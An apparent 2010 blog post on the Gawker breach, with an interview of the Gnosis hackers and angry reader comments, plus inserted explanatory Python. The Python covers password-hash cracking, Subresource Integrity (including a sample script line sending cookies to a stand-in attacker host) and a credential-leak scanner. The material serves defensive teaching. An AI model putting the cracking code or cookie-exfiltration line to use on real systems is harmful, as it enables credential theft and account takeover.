Uncategorized Monday, December 13th 2010 at 7:32 pm

The Gawker Hack and Web Security: The Gnosis Hackers Respond

This past weekend, Gawker Media was dealt a damaging blow when a group that calls itself Gnosis broke into Gawker’s servers and then released a torrent containing Gawker’s source code and a database of 1.3 million Gawker commenters’ usernames, e-mail addresses, and password hashes. Gnosis cracked about a fifth of those hashes: they used the DES-based crypt() scheme, which ignores everything after the eighth character of a password. Because many people reuse the same password across web services, this is bad news; this morning, Twitter said that a wave of acai-related spam had been traced to accounts whose e-mail addresses appeared in the Gawker leak. Gnosis also gained access to Gawker’s content management system and published a taunting post with a link to the torrent on The Pirate Bay. (Both the Gawker post and that particular Pirate Bay torrent have since been removed, but the data is out there now.)

In the wake of the attack, Gawker has promised to “[bring] in an independent security firm to improve security across our entire infrastructure. Additionally, we will continue to work with independent auditors to ensure we maintain a reliable level of security, as well as the processes necessary to ensure we maintain a safe environment for our commenters.” However, the attack has alarmed many of its readers, and should be alarming to most people who have transmitted their personal information over the Web. Perhaps even more alarming than the user database hack is the source code leak: Gawker is built on a proprietary, closed-source framework, which its proprietor Nick Denton says ‘underpins his entire empire to this day.’ Blogger Felix Salmon writes that Gawker Media is in the process of trying to transform into a technology company; this is a hard thing to do when your source code is thoroughly compromised.
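Two of the mechanics in the paragraphs above can be shown in code: why a fifth of the dump fell to a wordlist (the DES-based scheme the interview below refers to only looks at a password’s first eight characters), and the check a second service can run when somebody else’s leak lands on its users. What follows is an added example, not code from Gawker or Geekosystem. The legacy_hash function is a stand-in that models only the truncation and the short, cleartext salt, not real DES crypt(3); the wordlist, dump, e-mail addresses and the second service’s user table are all constructed.

```python
import hashlib
import hmac
import os

# ---------------------------------------------------------------------------
# Stand-in for the legacy scheme. This is NOT DES crypt(3); it models only the
# two properties the article raises: a two-character salt stored in the clear
# and truncation of the password to its first eight characters. SHA-1 here is
# a placeholder for DES's (small) work factor, nothing more.
# ---------------------------------------------------------------------------
def legacy_hash(password: str, salt: str) -> str:
    if len(salt) != 2:
        raise ValueError("legacy scheme uses a two-character salt")
    truncated = password[:8]  # anything after the eighth character is ignored
    digest = hashlib.sha1((salt + truncated).encode("utf-8")).hexdigest()
    return salt + digest


def legacy_verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(legacy_hash(password, stored[:2]), stored)


# ---------------------------------------------------------------------------
# Replacement: a salted, iterated KDF over the whole password. PBKDF2-HMAC is
# what the standard library offers; bcrypt, scrypt or Argon2 are the usual
# choices in practice.
# ---------------------------------------------------------------------------
ROUNDS = 100_000


def modern_hash(password: str, salt: bytes = None) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (ROUNDS, salt.hex(), dk.hex())


def modern_verify(password: str, stored: str) -> bool:
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack(dump: dict, wordlist: list) -> dict:
    """Offline dictionary attack on a leaked {email: legacy_hash} dump.

    Returns {email: recovered_password}. Because the legacy scheme truncates,
    a guess that matches the first eight characters is accepted, so a long
    password whose prefix is a dictionary word falls to the wordlist.
    """
    recovered = {}
    for email, stored in dump.items():
        salt = stored[:2]  # salt is in the clear, as in crypt(3)
        for guess in wordlist:
            if legacy_hash(guess, salt) == stored:
                recovered[email] = guess
                break
    return recovered


def reused_elsewhere(recovered: dict, other_service: dict) -> list:
    """Which recovered credentials also open accounts on another service?

    other_service maps email -> modern_hash(...). This is the check a second
    site (Twitter, in the article) can run against somebody else's leak to
    decide whose passwords to reset.
    """
    hits = []
    for email, password in recovered.items():
        stored = other_service.get(email)
        if stored is not None and modern_verify(password, stored):
            hits.append(email)
    return sorted(hits)


# Constructed sample data; nothing here comes from the real dump.
WORDLIST = ["123456", "password", "letmein", "qwerty", "gawker"]
LEAKED_DUMP = {
    "alice@example.com": legacy_hash("letmein", "ab"),
    "bob@example.com": legacy_hash("qwerty", "cd"),
    "carol@example.com": legacy_hash("Tr0ub4dor&3", "ef"),   # not in wordlist
    "dave@example.com": legacy_hash("password2010", "gh"),   # only 'password' counts
}
OTHER_SERVICE = {
    "alice@example.com": modern_hash("letmein"),     # same password reused
    "bob@example.com": modern_hash("qwerty2010"),    # different password
}

if __name__ == "__main__":
    found = crack(LEAKED_DUMP, WORDLIST)
    print("recovered:", found)
    print("reset these on the other service:", reused_elsewhere(found, OTHER_SERVICE))
    # Truncation: the legacy scheme accepts the 8-character guess for dave,
    # whereas the modern scheme hashes the whole password.
    print(legacy_verify("password", LEAKED_DUMP["dave@example.com"]))
    print(modern_verify("password", modern_hash("password2010")))
```

The two verify functions make the point the interviewer’s bracketed note hints at: under the legacy scheme every password that shares its first eight characters with a dictionary word is, for the attacker’s purposes, that word. The reuse check is only as good as the cracked list, which is why a second service should force resets for every e-mail address in a leak rather than just the ones it can confirm.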

Geekosystem got in touch with members of Gnosis and discussed what the attacks meant for Gawker Media, web publishers, and everyone who shares unsecured information on the Internet:

Geekosystem: I’m sure you all have been following today’s media coverage of the hack. What do you think was most misreported or underreported? What haven’t people been talking about enough with respect to the attacks that you think they should be talking about?

Gnosis: That answer is easy. The source code. I just read a post on Fox News that dealt entirely with the release of the database. While this is understandable, because your average Joe reader might not understand the full implications that come with releasing a site’s source code, I feel that it could be targeted a bit more. I expect, though, that the initial frenzy is to do with the database and that it will slowly fade into people researching the source (or rather, I hope that this will happen).

Just to spell it out: releasing a site’s source code is one of the worst things that could happen. The source that runs the site is now public, and this means anyone can view how it works, meaning exploits can be found for the code. What is worse is that with a large code base the site owners cannot simply refactor and change large portions of it; they are stuck and often have no choice but to continue running the public code base until a newer, private version is created, which can take a long time. They also have to consider that most of their code, which they worked hard on, is effectively dust-binned. Unless they take the open source route, of course.

As with any story, things spin out of control and people add their own opinions to the mix. The only sites that we released information to were Mediaite and TNW, which means that everything else is pure speculation and/or opinion. People are talking about security, which is good, and I think it has brought to light the security issues that face both users and sites, and I hope that Gawker and other sites can learn from the mistakes that led to this.

Editor’s note: At roughly the same time as our interview, Gnosis apparently gave an interview to The Next Web containing some additional information, including the number of people in the group (“13 members, with three ‘others’”), the relation between Gnosis’ recent action and Gawker’s spat with 4chan over the summer (none, they say), and why they released user data rather than just sitting on it (“Release is the safest path, as it allows lessons to be learned.”) It’s worth the read.

Geekosystem: You previously mentioned that Gawker used DES [Data Encryption Standard, an outdated hashing algorithm in which only the first eight characters of a password are necessary for login]. What other mistakes do you think that they made that made your attack easier? Nick Denton said today that Gawker Media will be hiring an outside firm to evaluate their properties’ web security; if they hired Gnosis, what would you tell them to change?

Gnosis: They made several mistakes which contributed to their compromise: leaving passwords literally lying around, using the same password for multiple accounts and services (a lot were weed related; perhaps they had been smoking a bit too much and forgot some basic security principles? (GANJA framework, anyone?!)). Unfortunately, I am afraid that until Gawker Media *do* hire us we cannot report fully on any of our findings. Sorry Nick!

Geekosystem: [...] Would you care to comment on [Felix Salmon's above-mentioned observation that Gawker may be trying to become a technology company], both in light of the attacks and as a group that knows Gawker’s framework very well now?

Gnosis: Gawker wrote their own framework and a lot of their site is powered by their own code. I personally *hate* PHP with a vengeance, and if I am perfectly honest I could not face myself to study the reams and reams of source code. We did get a good look and feel for the site’s internal structure, and it looked sturdy.

Geekosystem: One of the lessons a lot of people seem to have taken from the attacks is that third-party comment systems [Facebook Connect, DISQUS, etc.] are the way to go from a security vantage. Would you agree or disagree?

Gnosis: Third-party login systems have many advantages over custom-built ones, but they also introduce lots of risks. Centralized data is the way forward, I personally love OpenID and such, but I cannot fail to see the security implications. What if there was a security breach with these systems? Not only would the data be compromised but the integrity of every site that uses the system. Sites often forget (or don’t want to realize) that they are putting critical parts of their infrastructure into the hands of another company, who might have less stringent security controls. To take this a bit further, imagine the damage that would be caused if malicious users managed to replace Google’s analytics JavaScript file with their own malicious file that exploited some unknown vulnerability in people’s web browsers. Of course this scenario is a bit extreme, but it is valid nonetheless.

Geekosystem: Can you clarify your relationship with 4chan/Anonymous?

Gnosis: No relationship. Some of our members visit the site, but there are no ties or any form of relationship.

(They said more on this in their most recent interview with TNW: “As for 4chan, we are not directly connected, no. But 4chan’s influence on the net is large and several of our members visit the site. We don’t directly agree with some of 4chan’s tactics, or rather “anon’s” tactics. We believe that DDoSing sites won’t help their cause and will only generate negative press, and I personally see in the media a lot of acts being simply put under the umbrella of “4chan” or “anonymous”. We would have not wanted this to be lumped with such acts as DDoSing Amazon or Mastercard.”)

Geekosystem: At the end of your readme.txt [the text file which accompanied the torrented leaked data], you wrote, “We’ve not done yet, we have other targets in our sights.” What do you mean by this?

Gnosis: Only time will tell.
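Gnosis’s answer on third-party systems raises the case of a vendor’s JavaScript file being swapped for a malicious one on every site that loads it. The control that addresses exactly that scenario is Subresource Integrity, which the page does not mention: the publisher ships a hash of the exact script it reviewed in the script tag, and the browser refuses to execute anything that does not match. The code below is an added example, not code from Gawker, Google or Geekosystem; the script bytes, the vendor URL and the tampered copy are constructed, and the function names are this example’s own.

```python
import base64
import hashlib
import hmac

# Algorithms SRI permits, ranked; the browser honours only the strongest
# algorithm present in an integrity attribute.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}

# Constructed stand-in for a third party's script, e.g. an analytics loader.
TRUSTED_SCRIPT = (
    b"(function(w,d){w.track=function(e){/* send e to the vendor */};})"
    b"(window,document);\n"
)
# The same file after the substitution Gnosis describes: an appended payload.
TAMPERED_SCRIPT = TRUSTED_SCRIPT + (
    b"new Image().src='https://attacker.invalid/?c='+document.cookie;\n"
)


def sri_integrity(content: bytes, algo: str = "sha384") -> str:
    """Value for <script integrity="..."> covering exactly these bytes."""
    if algo not in STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return "%s-%s" % (algo, base64.b64encode(digest).decode("ascii"))


def script_tag(src: str, content: bytes) -> str:
    """The tag the publisher ships. crossorigin is required for SRI on a
    cross-origin resource, and the vendor must answer with CORS headers."""
    return ('<script src="%s" integrity="%s" crossorigin="anonymous"></script>'
            % (src, sri_integrity(content)))


def verify_integrity(content: bytes, integrity: str) -> bool:
    """What the browser does on load, following the SRI spec: keep only the
    tokens that use the strongest algorithm it understands and accept the
    resource if any of those matches. Tokens with unknown algorithms are
    ignored, and if nothing usable remains the resource loads UNCHECKED, so
    a typo in the algorithm name silently switches the protection off."""
    tokens = []
    for token in integrity.split():
        algo, sep, expected = token.partition("-")
        if sep and algo in STRENGTH:
            tokens.append((algo, expected))
    if not tokens:
        return True
    best = max(STRENGTH[algo] for algo, _ in tokens)
    for algo, expected in tokens:
        if STRENGTH[algo] != best:
            continue
        actual = base64.b64encode(hashlib.new(algo, content).digest()).decode("ascii")
        if hmac.compare_digest(actual.encode("ascii"), expected.encode("ascii")):
            return True
    return False


def pinned_update_needed(pinned_integrity: str, current_remote: bytes) -> bool:
    """Publisher-side check to run on a schedule: the vendor's file no longer
    matches what was reviewed and pinned, so the page is currently refusing it
    and someone has to review the new version before re-pinning."""
    return not verify_integrity(current_remote, pinned_integrity)


if __name__ == "__main__":
    pinned = sri_integrity(TRUSTED_SCRIPT)
    print(script_tag("https://vendor.invalid/loader.js", TRUSTED_SCRIPT))
    print("trusted copy loads:", verify_integrity(TRUSTED_SCRIPT, pinned))
    print("tampered copy loads:", verify_integrity(TAMPERED_SCRIPT, pinned))
    print("update needs review:", pinned_update_needed(pinned, TAMPERED_SCRIPT))
```

The caveat a practitioner would add: SRI only fits resources whose bytes you can pin. A vendor that updates its loader in place, as analytics scripts routinely do, will simply be blocked, so the realistic choices are to self-host a reviewed copy behind the pinned hash and gate each update with a check like pinned_update_needed, or to accept that the vendor’s security is now part of your own.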

  • Qwerty

    Pussies. Why didn’t you ask him about intentionally putting hundreds of thousands of people with no formal ties to Gawker at risk? Why didn’t you ask about the justification for that, why that was necessary.

  • myname

    This. Why harm hundreds of thousands of people completely unassociated with Gawker in order to teach a lesson to the people who manage it? It’s completely irresponsible. If they feel the release of the source code is more significant anyway, why do this?

  • Anonymous

    This is simple curiosity, not an insult, but why is leaking a site’s source so bad? Open source web platforms like WordPress seem fine and no less secure than other CMS’s.

  • Anonymous

    Depends on if they were relying on security-by-obscurity or not. If their code was well-written it may have a handful of easily fixable exploits, and those will definitely come out soon. Other than that, IMO, it’s not a big deal. Proprietary folks treat their source code like their private parts, but really it’s nothing to be cagey about. Some delude themselves into thinking they’ve done something special and are terrified that if their ub3r s3cr3ts get out their livelihood will disappear in a puff of smoke, but that is utter nonsense anyway. I am interested to see their implementation though and will be poking through the source. Doubt I’ll find anything of much interest. Blogs are blogs are blogs.

  • not saying

    The Gnosis hackers are scumbags. There is no justification for maliciously making people’s e-mail addresses and passwords accessible to any spammer or other party out there. They can do what they like to Gawker if they have some pre-school need to throw their tantrum, but exposing Gawker’s users is tantamount to digital assault.

  • caught up innocent person

    Ridiculous. This spokesperson (if you could call this person that) is complaining that Gawker was arrogant and so taught them a lesson. And despite putting our information for all to see online, he/she wonders why nobody is interested in the source code?!

    I’ll tell you why! You put our usernames and passwords on the open internet, you w******! That’s why! We don’t give a **** about some bleeding source code in comparison!!!

    Now, that is arrogance from Gnosis! I hope you all get taught a big lesson, by some big bloke who drops his soap in the shower room! You may think that you are doing everyone a service… wrong. Everyone affected and those not, but seeing the results, just think you are scum for involving us all in this!!

    Thanks but no thanks, you have intentionally opened people up to criminals… which we believe you are anyway!

  • Gonzo

    With your source code publicly available, people such as those in this “Gnosis” group can look through it for your mistakes. If they find ways of using your mistakes against you, you won’t know until it’s too late.

    When you put your code under Open Source, people are looking through it for your mistakes, but they’re publishing fixes to them that you can review and implement.

    With Closed Source made public, you get the worst of both worlds – the full exposure of Open Source with no help fixing it.
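Gonzo’s point, together with Gnosis’s remark in the interview about passwords “literally lying around”, describes the first job after a source leak: find every credential embedded in the tree and rotate it, because whoever has the code has those too. The scanner below is an added example, not Gawker’s or Geekosystem’s code and not a substitute for a maintained tool; the patterns, the placeholder list, the file names and the three sample files it scans are constructed for this illustration.

```python
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, int, str, str]  # (path, line number, kind, raw value)

# Patterns a reviewer of a leaked tree looks for first. Constructed for this
# example; maintained scanners (gitleaks, trufflehog) carry hundreds more.
PATTERNS = [
    ("hardcoded password",
     re.compile(r"""(?i)(?:pass(?:word|wd)?|pwd|secret)\s*(?:=>|=|:)\s*['"]([^'"]{4,})['"]""")),
    ("credentials in connection URL",
     re.compile(r"""(?i)\b[a-z][a-z0-9+.-]*://[^/\s:@'"]+:([^@\s'"]+)@""")),
    ("API key/token literal",
     re.compile(r"""(?i)(?:api[_-]?key|token)\s*(?:=>|=|:)\s*['"]([A-Za-z0-9_\-]{20,})['"]""")),
    ("private key block",
     re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")),
]

# Values that look like secrets but are placeholders or references, not the
# secret itself. Reporting them buries the real findings.
PLACEHOLDERS = {"changeme", "password", "example", "xxx", "todo", "secret"}


def is_placeholder(value: str) -> bool:
    v = value.strip()
    return (v.lower() in PLACEHOLDERS
            or v.startswith("${") or v.startswith("%(")
            or (v.startswith("<") and v.endswith(">")))


def redact(value: str) -> str:
    """Show enough to identify which secret it is, never the whole thing."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "****"


def scan_file(path: str, text: str) -> List[Finding]:
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            value = match.group(1) if match.groups() else match.group(0)
            if match.groups() and is_placeholder(value):
                continue
            findings.append((path, lineno, kind, value))
            break  # one finding per line is enough to trigger rotation
    return findings


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """files maps a relative path to its contents (read from disk in practice)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_file(path, text))
    return findings


def report(findings: List[Finding]) -> List[str]:
    """Redacted lines for a ticket; the raw values stay in the scanner only."""
    return ["%s:%d: %s (%s)" % (path, lineno, kind, redact(value))
            for path, lineno, kind, value in findings]


# Constructed sample tree in the style of a PHP site; none of it is Gawker's code.
SAMPLE_TREE = {
    "src/config.php": "\n".join([
        "<?php",
        "$db_host = 'db.internal';",
        "$db_user = 'cms';",
        "$db_pass = 's3cretpass';",
        "$dsn = 'mysql://cms:s3cretpass@db.internal/cms';",
        "define('API_KEY', getenv('CMS_API_KEY'));",  # read from env: fine
        "$example_password = '${DB_PASSWORD}';",      # placeholder: skipped
    ]),
    "config/settings.yml": "\n".join([
        "mailer:",
        '  api_key: "tk_live_4f9a7c2d1b8e6a3f5c0d9e2b"',
        '  password: "changeme"',
    ]),
    "deploy/id_rsa": "\n".join([
        "-----BEGIN RSA PRIVATE KEY-----",
        "MIIEowIBAAKCAQEA...(constructed, truncated)",
        "-----END RSA PRIVATE KEY-----",
    ]),
}

if __name__ == "__main__":
    for line in report(scan_tree(SAMPLE_TREE)):
        print(line)
```

Every hit is a credential to rotate, not merely a line to delete: once the tree is public, removing the literal from the next commit does nothing for the copy the attackers already hold. The environment-variable read and the “${DB_PASSWORD}” placeholder in the sample show the shape code should take instead.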

  • Gonzo

    It’s another case of a child with a toy. A mature person would see the problem, attempt to fix it by notifying the company, and if ignored, let their competitors ream them with bad press over the flaw. I’m not even sure if “immature” is sufficient, though, when you start releasing the personal information of users. We are not the programmers who made the mistake, nor is it our responsibility to make sure our choice of websites coincides with the whim of the latest batch of overgrown children who’ve decided that their malicious play is justified simply because they were able to do it.